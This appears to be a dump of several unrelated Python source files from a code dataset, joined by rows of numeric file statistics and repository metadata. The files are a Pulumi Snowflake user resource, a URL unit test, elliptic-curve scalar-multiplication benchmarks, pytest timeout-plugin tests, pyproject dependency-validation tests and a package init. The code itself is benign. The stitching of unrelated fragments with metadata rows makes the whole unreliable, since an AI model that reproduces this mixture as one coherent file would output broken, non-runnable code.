__props__.__dict__["comment"] = comment
__props__.__dict__["default_namespace"] = default_namespace
__props__.__dict__["default_role"] = default_role
__props__.__dict__["default_warehouse"] = default_warehouse
__props__.__dict__["disabled"] = disabled
__props__.__dict__["display_name"] = display_name
__props__.__dict__["email"] = email
__props__.__dict__["first_name"] = first_name
__props__.__dict__["has_rsa_public_key"] = has_rsa_public_key
__props__.__dict__["last_name"] = last_name
__props__.__dict__["login_name"] = login_name
__props__.__dict__["must_change_password"] = must_change_password
__props__.__dict__["name"] = name
__props__.__dict__["password"] = password
__props__.__dict__["rsa_public_key"] = rsa_public_key
__props__.__dict__["rsa_public_key2"] = rsa_public_key2
__props__.__dict__["tags"] = tags
return User(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def comment(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "comment")
@property
@pulumi.getter(name="defaultNamespace")
def default_namespace(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the namespace (database only or database and schema) that is active by default for the user’s session upon login.
"""
return pulumi.get(self, "default_namespace")
@property
@pulumi.getter(name="defaultRole")
def default_role(self) -> pulumi.Output[str]:
"""
Specifies the role that is active by default for the user’s session upon login.
"""
return pulumi.get(self, "default_role")
@property
@pulumi.getter(name="defaultWarehouse")
def default_warehouse(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the virtual warehouse that is active by default for the user’s session upon login.
"""
return pulumi.get(self, "default_warehouse")
@property
@pulumi.getter
def disabled(self) -> pulumi.Output[bool]:
return pulumi.get(self, "disabled")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
Name displayed for the user in the Snowflake web interface.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def email(self) -> pulumi.Output[Optional[str]]:
"""
Email address for the user.
"""
return pulumi.get(self, "email")
@property
@pulumi.getter(name="firstName")
def first_name(self) -> pulumi.Output[Optional[str]]:
"""
First name of the user.
"""
return pulumi.get(self, "first_name")
@property
@pulumi.getter(name="hasRsaPublicKey")
def has_rsa_public_key(self) -> pulumi.Output[bool]:
"""
Will be true if user as an RSA key set.
"""
return pulumi.get(self, "has_rsa_public_key")
@property
@pulumi.getter(name="lastName")
def last_name(self) -> pulumi.Output[Optional[str]]:
"""
Last name of the user.
"""
return pulumi.get(self, "last_name")
@property
@pulumi.getter(name="loginName")
def login_name(self) -> pulumi.Output[str]:
"""
The name users use to log in. If not supplied, snowflake will use name instead.
"""
return pulumi.get(self, "login_name")
@property
@pulumi.getter(name="mustChangePassword")
def must_change_password(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies whether the user is forced to change their password on next login (including their first/initial login) into the system.
"""
return pulumi.get(self, "must_change_password")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the user. Note that if you do not supply login*name this will be used as login*name. [doc](https://docs.snowflake.net/manuals/sql-reference/sql/create-user.html#required-parameters)
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def password(self) -> pulumi.Output[Optional[str]]:
"""
**WARNING:** this will put the password in the terraform state file. Use carefully.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter(name="rsaPublicKey")
def rsa_public_key(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the user’s RSA public key; used for key-pair authentication. Must be on 1 line without header and trailer.
"""
return pulumi.get(self, "rsa_public_key")
@property
@pulumi.getter(name="rsaPublicKey2")
def rsa_public_key2(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the user’s second RSA public key; used to rotate the public and private keys for key-pair authentication based on an expiration schedule set by your organization. Must be on 1 line without header and trailer.
"""
return pulumi.get(self, "rsa_public_key2")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence['outputs.UserTag']]]:
"""
Definitions of a tag to associate with the resource.
"""
return pulumi.get(self, "tags")
| 45.785479 | 268 | 0.650256 | 5,228 | 41,619 | 4.979151 | 0.043803 | 0.094234 | 0.089816 | 0.098882 | 0.941608 | 0.932504 | 0.91852 | 0.913104 | 0.90907 | 0.888287 | 0 | 0.001684 | 0.243975 | 41,619 | 908 | 269 | 45.835903 | 0.825616 | 0.331699 | 0 | 0.875926 | 1 | 0 | 0.091762 | 0.000969 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.092593 | 0.012963 | 0.011111 | 0.27963 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
c8d3f071ed1242736e47ce0a97bb4dde82926ef0 | 148 | py | Python | tests/web/test_urls.py | vyahello/weather-chatbot | 721229b106cdd35aee63ea690156b852c077e923 | [
"Apache-2.0"
] | null | null | null | tests/web/test_urls.py | vyahello/weather-chatbot | 721229b106cdd35aee63ea690156b852c077e923 | [
"Apache-2.0"
] | null | null | null | tests/web/test_urls.py | vyahello/weather-chatbot | 721229b106cdd35aee63ea690156b852c077e923 | [
"Apache-2.0"
] | 2 | 2019-10-30T16:47:08.000Z | 2020-01-01T18:45:46.000Z | from chat.web.urls import CommonUrl
def test_common_url() -> None:
assert CommonUrl("https://path/to/url").compose() == "https://path/to/url"
| 24.666667 | 78 | 0.689189 | 22 | 148 | 4.545455 | 0.727273 | 0.18 | 0.22 | 0.28 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121622 | 148 | 5 | 79 | 29.6 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0.256757 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
7407e78fb3933aaa0c1ece63da71dfd8c7895634 | 6,976 | py | Python | Code/PerformanceComparison/TestScripts/scalar_mul_tests.py | dev-alberto/Bachelor2017 | 1d3c44ff3b56a6030e08ef9d24920f83df1ae89e | [
"Apache-2.0"
] | null | null | null | Code/PerformanceComparison/TestScripts/scalar_mul_tests.py | dev-alberto/Bachelor2017 | 1d3c44ff3b56a6030e08ef9d24920f83df1ae89e | [
"Apache-2.0"
] | null | null | null | Code/PerformanceComparison/TestScripts/scalar_mul_tests.py | dev-alberto/Bachelor2017 | 1d3c44ff3b56a6030e08ef9d24920f83df1ae89e | [
"Apache-2.0"
] | null | null | null | from Code.DataStructures.PrimeCurves import P192, P384
from Code.PerformanceComparison.scalar_mul import ScalarMuliplicationPerformanceTest
scalar_mul_affine_test192 = ScalarMuliplicationPerformanceTest(1000, P192, [2**5, 2**32], 3)
scalar_mul_affine_test192Big = ScalarMuliplicationPerformanceTest(1000, P192, [2**128, 2**192], 3)
scalar_mul_jacobi_test192 = ScalarMuliplicationPerformanceTest(1000, P192, [2**5, 2**32], 3, jacobi=True)
scalar_mul_jacobi_test192Big_3 = ScalarMuliplicationPerformanceTest(1000, P192, [2**128, 2**192], 3, jacobi=True)
scalar_mul_jacobi_test192Big_4 = ScalarMuliplicationPerformanceTest(1000, P192, [2**128, 2**192], 4, jacobi=True)
scalar_mul_jacobi_test192Big_5 = ScalarMuliplicationPerformanceTest(1000, P192, [2**128, 2**192], 5, jacobi=True)
scalar_mul_jacobi_test192Big_7 = ScalarMuliplicationPerformanceTest(1000, P192, [2**128, 2**192], 7, jacobi=True)
scalar_mul_affine_test384 = ScalarMuliplicationPerformanceTest(1000, P384, [2**5, 2**32], 3)
scalar_mul_affine_test384Big = ScalarMuliplicationPerformanceTest(1000, P384, [2**330, 2**384], 3)
scalar_mul_jacobi_test384 = ScalarMuliplicationPerformanceTest(1000, P384, [2**5, 2**32], 3, jacobi=True)
scalar_mul_jacobi_test384Big_3 = ScalarMuliplicationPerformanceTest(1000, P384, [2**330, 2**384], 3, jacobi=True)
scalar_mul_jacobi_test384Big_4 = ScalarMuliplicationPerformanceTest(1000, P384, [2**330, 2**384], 4, jacobi=True)
scalar_mul_jacobi_test384Big_5 = ScalarMuliplicationPerformanceTest(1000, P384, [2**330, 2**384], 5, jacobi=True)
scalar_mul_jacobi_test384Big_7 = ScalarMuliplicationPerformanceTest(1000, P384, [2**330, 2**384], 7, jacobi=True)
print("SCALAR MUL")
print("*** 192 ***")
print("Binary algo")
print("Affine")
print(scalar_mul_affine_test192.binary_scalar_mul_test())
print(scalar_mul_affine_test192Big.binary_scalar_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test192.binary_scalar_mul_test())
print(scalar_mul_jacobi_test192Big_3.binary_scalar_mul_test())
print("left to right, signed")
print("Affine")
print(scalar_mul_affine_test192.left_to_right_scalar_mul_test())
print(scalar_mul_affine_test192Big.left_to_right_scalar_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test192.left_to_right_scalar_mul_test())
print(scalar_mul_jacobi_test192Big_3.left_to_right_scalar_mul_test())
print("right to left, signed")
print("Affine")
print(scalar_mul_affine_test192.right_to_left_scalar_mul_test())
print(scalar_mul_affine_test192Big.right_to_left_scalar_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test192.right_to_left_scalar_mul_test())
print(scalar_mul_jacobi_test192Big_3.right_to_left_scalar_mul_test())
print("window NAF")
print("Affine")
print(scalar_mul_affine_test192.window_naf_mul_test())
print(scalar_mul_affine_test192Big.window_naf_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test192.window_naf_mul_test())
print(scalar_mul_jacobi_test192Big_3.window_naf_mul_test())
print("Window tests, ignore for averages")
print(scalar_mul_jacobi_test192Big_3.window_naf_mul_test())
print(scalar_mul_jacobi_test192Big_4.window_naf_mul_test())
print(scalar_mul_jacobi_test192Big_5.window_naf_mul_test())
print("window NAF right to left")
print("Affine")
print(scalar_mul_affine_test192.right_to_left_scalar_mul_test())
print(scalar_mul_affine_test192Big.right_to_left_scalar_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test192.window_naf_right_to_left_test())
print(scalar_mul_jacobi_test192Big_3.window_naf_right_to_left_test())
print("Igonore for averages")
print(scalar_mul_jacobi_test192Big_3.window_naf_right_to_left_test())
print(scalar_mul_jacobi_test192Big_4.window_naf_right_to_left_test())
print(scalar_mul_jacobi_test192Big_5.window_naf_right_to_left_test())
print("sliding window")
print(scalar_mul_affine_test192.sliding_window_left_to_right_test())
print(scalar_mul_affine_test192Big.sliding_window_left_to_right_test())
print("Jacobi")
print(scalar_mul_jacobi_test192.sliding_window_left_to_right_test())
print(scalar_mul_jacobi_test192Big_7.sliding_window_left_to_right_test())
print("Ignore for averages")
print(scalar_mul_jacobi_test192Big_3.sliding_window_left_to_right_test())
print(scalar_mul_jacobi_test192Big_4.sliding_window_left_to_right_test())
print(scalar_mul_jacobi_test192Big_7.sliding_window_left_to_right_test())
print("****")
print("*** 384 ***")
print("Binary algo")
print("Affine")
print(scalar_mul_affine_test384.binary_scalar_mul_test())
print(scalar_mul_affine_test384Big.binary_scalar_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test384.binary_scalar_mul_test())
print(scalar_mul_jacobi_test384Big_3.binary_scalar_mul_test())
print("left to right, signed")
print("Affine")
print(scalar_mul_affine_test384.left_to_right_scalar_mul_test())
print(scalar_mul_affine_test384Big.left_to_right_scalar_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test384.left_to_right_scalar_mul_test())
print(scalar_mul_jacobi_test384Big_3.left_to_right_scalar_mul_test())
print("right to left, signed")
print("Affine")
print(scalar_mul_affine_test384.right_to_left_scalar_mul_test())
print(scalar_mul_affine_test384Big.right_to_left_scalar_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test384.right_to_left_scalar_mul_test())
print(scalar_mul_jacobi_test384Big_3.right_to_left_scalar_mul_test())
print("window NAF")
print("Affine")
print(scalar_mul_affine_test384.window_naf_mul_test())
print(scalar_mul_affine_test384Big.window_naf_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test384.window_naf_mul_test())
print(scalar_mul_jacobi_test384Big_3.window_naf_mul_test())
print("Window tests, ignore for averages")
print(scalar_mul_jacobi_test384Big_3.window_naf_mul_test())
print(scalar_mul_jacobi_test384Big_4.window_naf_mul_test())
print(scalar_mul_jacobi_test384Big_5.window_naf_mul_test())
print("window NAF right to left")
print("Affine")
print(scalar_mul_affine_test384.right_to_left_scalar_mul_test())
print(scalar_mul_affine_test384Big.right_to_left_scalar_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test384.window_naf_right_to_left_test())
print(scalar_mul_jacobi_test384Big_3.window_naf_right_to_left_test())
print("Igonore for averages")
print(scalar_mul_jacobi_test384Big_3.window_naf_right_to_left_test())
print(scalar_mul_jacobi_test384Big_4.window_naf_right_to_left_test())
print(scalar_mul_jacobi_test384Big_5.window_naf_right_to_left_test())
print("sliding window")
print(scalar_mul_affine_test384.sliding_window_left_to_right_test())
print(scalar_mul_affine_test384Big.sliding_window_left_to_right_test())
print("Jacobi")
print(scalar_mul_jacobi_test384.sliding_window_left_to_right_test())
print(scalar_mul_jacobi_test384Big_7.sliding_window_left_to_right_test())
print("Ignore for averages")
print(scalar_mul_jacobi_test384Big_3.sliding_window_left_to_right_test())
print(scalar_mul_jacobi_test384Big_4.sliding_window_left_to_right_test())
print(scalar_mul_jacobi_test384Big_7.sliding_window_left_to_right_test())
print("****")
| 45.894737 | 113 | 0.850631 | 1,053 | 6,976 | 5.098765 | 0.042735 | 0.184392 | 0.174707 | 0.156454 | 0.952133 | 0.950643 | 0.920097 | 0.843733 | 0.75731 | 0.644813 | 0 | 0.075183 | 0.042861 | 6,976 | 151 | 114 | 46.198676 | 0.72892 | 0 | 0 | 0.488189 | 0 | 0 | 0.074255 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.015748 | 0 | 0.015748 | 0.874016 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
cdc7985767797fe12ff8911ceeb86de978f14dbb | 8,657 | py | Python | test_pytest_timeouts.py | bigbZik/pytest-timeouts | 7db280b3e8f8663039130ccfcdc2eb455944a25f | [
"MIT"
] | 9 | 2018-07-11T20:39:10.000Z | 2021-12-30T20:49:02.000Z | test_pytest_timeouts.py | bigbZik/pytest-timeouts | 7db280b3e8f8663039130ccfcdc2eb455944a25f | [
"MIT"
] | 23 | 2018-06-30T12:15:11.000Z | 2019-12-30T19:42:34.000Z | test_pytest_timeouts.py | bigbZik/pytest-timeouts | 7db280b3e8f8663039130ccfcdc2eb455944a25f | [
"MIT"
] | 2 | 2018-06-28T09:47:21.000Z | 2019-09-16T20:52:41.000Z | pytest_plugins = 'pytester'
def test_arg_parse(testdir):
testdir.makepyfile("""
def test_dummy(): pass
""")
result = testdir.runpytest(
'--setup-timeout=1.5',
'--execution-timeout=2.5',
'--teardown-timeout=3.5',
)
result.stdout.fnmatch_lines([
"setup timeout: 1.5s, execution timeout: 2.5s, teardown timeout: 3.5s"
])
def test_ini_parse(testdir):
testdir.makepyfile("""
def test_dummy(): pass
""")
testdir.makeini("""
[pytest]
setup_timeout = 1.5
execution_timeout = 2.5
teardown_timeout = 3.5
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"setup timeout: 1.5s, execution timeout: 2.5s, teardown timeout: 3.5s"
])
def test_setup_timeout(testdir):
testdir.makepyfile("""
import pytest
import time
@pytest.fixture(scope='function')
def fx():
time.sleep(1)
yield
def test_dummy(fx):
pass
""")
result = testdir.runpytest('--setup-timeout=0.5')
result.stdout.fnmatch_lines([
'*Failed: Timeout >0.5s*'
])
def test_execution_timeout(testdir):
testdir.makepyfile("""
import pytest
import time
@pytest.fixture(scope='function')
def fx2():
time.sleep(1)
yield
def test_dummy():
time.sleep(1)
""")
result = testdir.runpytest('--execution-timeout=0.4')
result.stdout.fnmatch_lines([
'*Failed: Timeout >0.4s*'
])
def test_teardown_timeout(testdir):
testdir.makepyfile("""
import pytest
import time
@pytest.fixture(scope='function')
def fx():
yield
time.sleep(1)
def test_dummy(fx):
pass
""")
result = testdir.runpytest('--teardown-timeout=0.3')
result.stdout.fnmatch_lines([
'*Failed: Timeout >0.3s*'
])
def test_execucution_marker_timeout(testdir):
testdir.makepyfile("""
import pytest
import time
@pytest.mark.execution_timeout(0.2)
def test_dummy():
time.sleep(1)
""")
result = testdir.runpytest('--strict')
result.stdout.fnmatch_lines([
'*Failed: Timeout >0.2s*'
])
def test_setup_marker_timeout(testdir):
testdir.makepyfile("""
import pytest
import time
@pytest.fixture(scope='function')
def fx():
time.sleep(1)
yield
@pytest.mark.setup_timeout(0.2)
def test_dummy(fx):
time.sleep(1)
""")
result = testdir.runpytest('--strict')
result.stdout.fnmatch_lines([
'*Failed: Timeout >0.2s*'
])
def test_teardown_marker_timeout(testdir):
testdir.makepyfile("""
import pytest
import time
@pytest.fixture(scope='function')
def fx():
yield
time.sleep(1)
@pytest.mark.teardown_timeout(0.2)
def test_dummy(fx):
pass
""")
result = testdir.runpytest('--strict')
result.stdout.fnmatch_lines([
'*Failed: Timeout >0.2s*'
])
def test_timeout_setting_order(testdir):
testdir.makepyfile("""
import pytest
import time
@pytest.fixture(scope='function')
def fx():
yield
time.sleep(1)
@pytest.fixture(scope='function')
def fx2():
time.sleep(1)
yield
@pytest.mark.teardown_timeout(0.2)
def test_dummy(fx):
pass
@pytest.mark.setup_timeout(0.4)
def test_dummy2(fx2):
pass
""")
testdir.makeini("""
[pytest]
setup_timeout = 0.3
teardown_timeout = 0.3
""")
result = testdir.runpytest('--setup-timeout=0.1')
result.stdout.fnmatch_lines([
'*Failed: Timeout >0.2s*',
'*Failed: Timeout >0.1s*',
])
def test_timeout_override_order(testdir):
testdir.makepyfile("""
import pytest
import time
@pytest.fixture(scope='function')
def fx():
yield
time.sleep(1)
@pytest.fixture(scope='function')
def fx2():
time.sleep(1)
yield
@pytest.mark.teardown_timeout(0.2)
def test_dummy(fx):
pass
@pytest.mark.setup_timeout(0.4)
def test_dummy_2(fx2):
pass
""")
testdir.makeini("""
[pytest]
setup_timeout = 0.1
""")
result = testdir.runpytest(
'--setup-timeout=0.3',
'--teardown-timeout=0.3',
'--timeouts-order=imo',
)
result.stdout.fnmatch_lines([
'*Failed: Timeout >0.2s*',
'*Failed: Timeout >0.1s*',
])
def test_disable_args_and_markers(testdir):
testdir.makepyfile("""
import pytest
import time
@pytest.fixture(scope='function')
def fx():
yield
time.sleep(1)
@pytest.fixture(scope='function')
def fx2():
time.sleep(1)
yield
@pytest.mark.teardown_timeout(0.2)
def test_dummy(fx):
pass
@pytest.mark.setup_timeout(0.4)
def test_dummy_2(fx2):
pass
""")
testdir.makeini("""
[pytest]
setup_timeout = 0.1
teardown_timeout = 0.1
""")
result = testdir.runpytest(
'--setup-timeout=0.3',
'--teardown-timeout=0.3',
'--timeouts-order=i',
)
result.stdout.fnmatch_lines([
'*Failed: Timeout >0.1s*',
'*Failed: Timeout >0.1s*',
])
def test_marker_value_missing(testdir):
testdir.makepyfile("""
import pytest
import time
@pytest.mark.execution_timeout()
def test_dummy():
time.sleep(1)
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
'*TypeError:*'
])
def test_marker_value_invalid(testdir):
testdir.makepyfile("""
import pytest
import time
@pytest.mark.execution_timeout('asdf')
def test_dummy():
time.sleep(1)
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
'*ValueError:*'
])
def test_timeout_scope_fixture(testdir):
testdir.makepyfile("""
import pytest
import time
pytestmark = [
pytest.mark.teardown_timeout(0.12, 'function'),
pytest.mark.teardown_timeout(0.14, 'module'),
pytest.mark.teardown_timeout(0.13),
]
@pytest.fixture(scope='function')
def fx():
yield
time.sleep(1)
@pytest.fixture(scope='class')
def fx2():
yield
time.sleep(1)
@pytest.fixture(scope='module')
def fx3():
yield
time.sleep(1)
def test_dummy(fx):
pass
def test_dummy_2(fx2):
pass
@pytest.mark.teardown_timeout(0.11)
def test_dummy_4(fx):
pass
def test_dummy_3(fx3):
pass
""")
testdir.makeini("""
[pytest]
teardown_timeout = 0.15
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
'*Failed: Timeout >0.12s*',
'*Failed: Timeout >0.13s*',
'*Failed: Timeout >0.11s*',
'*Failed: Timeout >0.14s*',
])
def test_empty_timeout_order_should_show_error_on_startup(testdir):
testdir.makepyfile("""
import pytest
import time
def test_dummy():
time.sleep(1)
""")
result = testdir.runpytest(
'--timeouts-order=',
)
result.stderr.fnmatch_lines([
'ERROR: Order should have at least 1 and less then or equal 3 elements'
])
def test_4_timeout_order_item_should_show_error_on_startup(testdir):
testdir.makepyfile("""
import pytest
import time
def test_dummy():
time.sleep(1)
""")
result = testdir.runpytest(
'--timeouts-order=imoi',
)
result.stderr.fnmatch_lines([
'ERROR: Order should have at least 1 and less then or equal 3 elements'
])
def test_incorrect_timeout_order_item_should_show_error_on_startup(testdir):
testdir.makepyfile("""
import pytest
import time
def test_dummy():
time.sleep(1)
""")
result = testdir.runpytest(
'--timeouts-order=xa',
)
result.stderr.fnmatch_lines([
'ERROR: Incorrect item * in timeout order list'
])
| 21.012136 | 79 | 0.545801 | 925 | 8,657 | 4.963243 | 0.105946 | 0.074929 | 0.057504 | 0.098018 | 0.885428 | 0.84731 | 0.815726 | 0.743847 | 0.698105 | 0.674799 | 0 | 0.027901 | 0.32517 | 8,657 | 411 | 80 | 21.06326 | 0.75796 | 0 | 0 | 0.780952 | 0 | 0 | 0.63209 | 0.128798 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053968 | false | 0.047619 | 0.095238 | 0 | 0.149206 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b5792de3bbe9d498fd0dcb96797ed2df05b5c3b1 | 7,146 | py | Python | tests/test_dependencies.py | ofek/pyproject-validate | 7417874ed092770c076b44b57458135b32a2044d | [
"MIT"
] | 2 | 2022-02-21T18:04:50.000Z | 2022-02-22T04:03:46.000Z | tests/test_dependencies.py | ofek/pyproject-validate | 7417874ed092770c076b44b57458135b32a2044d | [
"MIT"
] | null | null | null | tests/test_dependencies.py | ofek/pyproject-validate | 7417874ed092770c076b44b57458135b32a2044d | [
"MIT"
] | null | null | null | class TestDependenciesInvalid:
BEFORE = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
dependencies = [
"foo",
"",
"bar^0.1",
"baz",
]
"""
def test_error(self, project_file, invoke):
project_file.write(self.BEFORE)
result = invoke()
assert result.code == 1, result.output
assert (
result.output
== """\
<<< dependencies >>>
error: dependencies #2: Parse error at "''": Expected W:(0-9A-Za-z)
error: dependencies #3: Parse error at "'^0.1'": Expected string_end
"""
)
def test_cannot_fix(self, project_file, invoke):
project_file.write(self.BEFORE)
result = invoke("--fix")
assert result.code == 1, result.output
assert (
result.output
== """\
<<< dependencies >>>
error: dependencies #2: Parse error at "''": Expected W:(0-9A-Za-z)
error: dependencies #3: Parse error at "'^0.1'": Expected string_end
"""
)
class TestOptionalDependenciesInvalid:
BEFORE = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
dependencies = [
"bar",
"foo",
]
[project.optional-dependencies]
foo = [
"foo",
"",
"bar^0.1",
"baz",
]
"""
def test_error(self, project_file, invoke):
project_file.write(self.BEFORE)
result = invoke()
assert result.code == 1, result.output
assert (
result.output
== """\
<<< dependencies >>>
error: optional `foo` dependencies #2: Parse error at "''": Expected W:(0-9A-Za-z)
error: optional `foo` dependencies #3: Parse error at "'^0.1'": Expected string_end
"""
)
def test_cannot_fix(self, project_file, invoke):
project_file.write(self.BEFORE)
result = invoke("--fix")
assert result.code == 1, result.output
assert (
result.output
== """\
<<< dependencies >>>
error: optional `foo` dependencies #2: Parse error at "''": Expected W:(0-9A-Za-z)
error: optional `foo` dependencies #3: Parse error at "'^0.1'": Expected string_end
"""
)
class TestDependenciesNormalization:
BEFORE = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
dependencies = [
"python-dateutil",
"bAr.Baz[TLS] >=1.2RC5",
'Foo;python_version<"3.8"',
]
"""
AFTER = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
dependencies = [
"bar-baz[tls]>=1.2rc5",
"foo; python_version < '3.8'",
"python-dateutil",
]
"""
def test_error(self, project_file, invoke):
project_file.write(self.BEFORE)
result = invoke()
assert result.code == 1, result.output
assert (
result.output
== """\
<<< dependencies >>>
error: dependencies #2 should be: bar-baz[tls]>=1.2rc5
error: dependencies #3 should be: foo; python_version < '3.8'
"""
)
def test_fix(self, project_file, invoke):
project_file.write(self.BEFORE)
result = invoke("--fix")
assert result.code == 0, result.output
assert not result.output
assert project_file.read() == self.AFTER
result = invoke()
assert result.code == 0, result.output
assert not result.output
class TestOptionalDependenciesNormalization:
BEFORE = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
dependencies = [
"bar",
"foo",
]
[project.optional-dependencies]
foo = [
"python-dateutil",
"bAr.Baz[TLS]>=1.2RC5",
'Foo; python_version < "3.8"',
]
"""
AFTER = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
dependencies = [
"bar",
"foo",
]
[project.optional-dependencies]
foo = [
"bar-baz[tls]>=1.2rc5",
"foo; python_version < '3.8'",
"python-dateutil",
]
"""
def test_error(self, project_file, invoke):
project_file.write(self.BEFORE)
result = invoke()
assert result.code == 1, result.output
assert (
result.output
== """\
<<< dependencies >>>
error: optional `foo` dependencies #2 should be: bar-baz[tls]>=1.2rc5
error: optional `foo` dependencies #3 should be: foo; python_version < '3.8'
"""
)
def test_fix(self, project_file, invoke):
project_file.write(self.BEFORE)
result = invoke("--fix")
assert result.code == 0, result.output
assert not result.output
assert project_file.read() == self.AFTER
result = invoke()
assert result.code == 0, result.output
assert not result.output
class TestDependenciesSorting:
BEFORE = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
dependencies = [
"foo",
"bar",
]
"""
AFTER = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
dependencies = [
"bar",
"foo",
]
"""
def test_error(self, project_file, invoke):
project_file.write(self.BEFORE)
result = invoke()
assert result.code == 1, result.output
assert (
result.output
== """\
<<< dependencies >>>
error: dependencies are not sorted
"""
)
def test_fix(self, project_file, invoke):
project_file.write(self.BEFORE)
result = invoke("--fix")
assert result.code == 0, result.output
assert not result.output
assert project_file.read() == self.AFTER
result = invoke()
assert result.code == 0, result.output
assert not result.output
class TestOptionalDependenciesSorting:
BEFORE = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
[project.optional-dependencies]
foo = [
"foo",
"bar",
]
"""
AFTER = """\
[build-system]
requires = [
"hatchling",
]
build-backend = "hatchling.build"
[project]
name = "foo"
version = "0.0.1"
[project.optional-dependencies]
foo = [
"bar",
"foo",
]
"""
def test_error(self, project_file, invoke):
project_file.write(self.BEFORE)
result = invoke()
assert result.code == 1, result.output
assert (
result.output
== """\
<<< dependencies >>>
error: optional `foo` dependencies are not sorted
"""
)
def test_fix(self, project_file, invoke):
project_file.write(self.BEFORE)
result = invoke("--fix")
assert result.code == 0, result.output
assert not result.output
assert project_file.read() == self.AFTER
result = invoke()
assert result.code == 0, result.output
assert not result.output
| 19.261456 | 83 | 0.584243 | 796 | 7,146 | 5.179648 | 0.074121 | 0.093136 | 0.087315 | 0.061121 | 0.956585 | 0.953917 | 0.953917 | 0.953917 | 0.953917 | 0.953917 | 0 | 0.020393 | 0.258886 | 7,146 | 370 | 84 | 19.313514 | 0.758119 | 0 | 0 | 0.857143 | 0 | 0.019934 | 0.472432 | 0.035125 | 0 | 0 | 0 | 0 | 0.119601 | 1 | 0.039867 | false | 0 | 0 | 0 | 0.093023 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a90bdc0ed8fbfbdaeb7cdc4865510ff666d8745e | 58 | py | Python | pygameloop/__init__.py | gaming32/pygameloop | a3bb926a0e4504ef669cabe67ae7f1ac61933197 | [
"MIT"
] | null | null | null | pygameloop/__init__.py | gaming32/pygameloop | a3bb926a0e4504ef669cabe67ae7f1ac61933197 | [
"MIT"
] | null | null | null | pygameloop/__init__.py | gaming32/pygameloop | a3bb926a0e4504ef669cabe67ae7f1ac61933197 | [
"MIT"
] | null | null | null | from .pygameloop import *
